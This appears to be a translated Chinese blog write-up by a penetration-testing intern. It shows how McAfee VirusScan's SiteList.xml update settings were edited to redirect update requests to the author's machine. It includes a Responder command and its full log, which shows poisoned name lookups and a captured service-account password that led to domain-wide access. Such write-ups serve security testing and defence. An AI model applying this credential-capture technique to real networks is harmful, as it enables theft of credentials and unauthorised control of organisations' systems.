在做测试员的实习工作期间,我找到了一个很棒的方法,可以在Active Directory 域(活动目录域)中实现privesc脚本。我借用了一名员工的笔记本电脑和他的低权限的McAfee帐号,准备来实现这一功能。在这台笔记本上装有McAfee Virusscan Enterprise 8.8版本软件。
McAfee能给用户提供一个这样的功能:用户可通过McAfee来自定义进行服务器的更新,同时用户可通过HTTP或SMB连接到这些服务器。(路径是:C:ProgramDataMcAfeeCommon Framework)Sitelist.xml配置文件中包含着大量的信息,比如:信息凭证,内部服务器的名字等等。
接下来,我们可以在所使用的McAfee杀毒服务中,查看相关的用户权限。
不幸的是,由于该笔记本上的AV(McAfee Virusscan Enterprise :McAfee公司推出的一款杀毒软件,具有防病毒+ 防火墙的功能,能阻止恶意软件入侵PC。)占用了GUI(Graphical User Interface,图形用户界面,简称GUI)的密码,使得我无法对该文件进行编辑。为了解决这一问题,我重新下载了McAfee软件,并把它装在了自己的Windows虚拟机中,同时将之前SiteList.xml中的sesame系统框架文件拷贝了过来。
在完成上述操作之后,离成功就不远了。我编辑的那个文件,能让我实现这样一个功能:我可以将用户的一个HTTP请求进行重定向,强制将其连接到我原先设置好的,任意一个服务器上,从而我就能冒名地对这些请求进行回应。SiteList.xml文件如下图所示:
之后,我点击进入了McAfee AV ,将它和相应的响应器进行了更新,从而可以查看相关的矩阵信息。
root@kali:~/Tools/responder# python Responder.py -I eth0 --basic __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR & MDNS Responder 2.3 Original work by Laurent Gaffie ([email protected]) To kill this script hit CRTL-C ... [+] Poisoners: LLMNR [ON] NBT-NS [ON] DNS/MDNS [ON] [+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] [+] HTTP Options: Always serving EXE [OFF] Serving EXE [ON] Serving HTML [OFF] Upstream Proxy [OFF] [+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [OFF] Force Basic Auth [ON] Force LM downgrade [OFF] Fingerprint hosts [OFF] [+] Generic Options: Responder NIC [eth0] Responder IP [192.168.169.140] Challenge set [1122334455667788] [+] Listening for events... [*] [LLMNR] Poisoned answer sent to 192.168.169.141 for name fuckingrandomserver [HTTP] Basic Client : 192.168.169.141 [HTTP] Basic Username : McAfeeService [HTTP] Basic Password : *cool_its_a_strong_password/*
OMG,我做到了。现在,我已经将活动目录域的权限扩大了。可以通过登录域名控制台,访问该主机域内的所有工作站。
这样,任务就完成了!
还没有评论,来说两句吧...